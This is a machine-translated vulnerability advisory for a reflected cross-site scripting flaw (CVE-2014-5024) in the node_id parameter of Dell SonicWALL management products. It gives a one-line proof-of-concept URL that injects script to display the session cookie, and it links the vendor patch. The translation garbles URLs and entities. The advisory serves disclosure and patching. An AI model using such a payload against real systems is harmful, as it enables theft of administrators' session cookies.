Cross-site scripting vulnerability in the 'node _ id' parameter of multiple Dell SonicWALL Products

Cross-site scripting vulnerability in the 'node _ id' parameter of multiple Dell SonicWALL Products

Release date:
Updated on:

Affected Systems:
SonicWALL GMS/Analyzer/UMA
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68829
CVE (CAN) ID: CVE-2014-5024
 
SonicWALL provides Internet Security Solutions for small and medium-sized enterprises and distributed enterprises.
 
Dell SonicWALL Global Management System, Dell SonicWALL Analyzer, and Dell SonicWALL Universal Managemnet Appliance have a reflected XSS vulnerability. This vulnerability occurs on the page "/sgms/panelManager? Level = 1 & typeOfUnits = 2 & node_name = GlobalView & node_id = (HERE
XSS) "in the" node_id "parameter is injected into the code, which allows attackers to steal cookie authentication creden。 and execute arbitrary code.
 
<* Source: William Costa

Link: http://seclists.org/fulldisclosure/2014/Jul/125
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com: 8443/sgms/panelManager? Level = 1 & amp; typeOfUnits = 2 & amp; node_name = GlobalView & amp; node_id = aaaaaaa & amp; apos; & amp; lt; /script & amp; gt; & amp; lt; body onload = alert (document. cookie) & amp; gt; & amp; panelidz = 0, 4 # tabs-4

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
SonicWALL
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Https://support.software.dell.com/product-notification/128245

This article permanently updates the link address: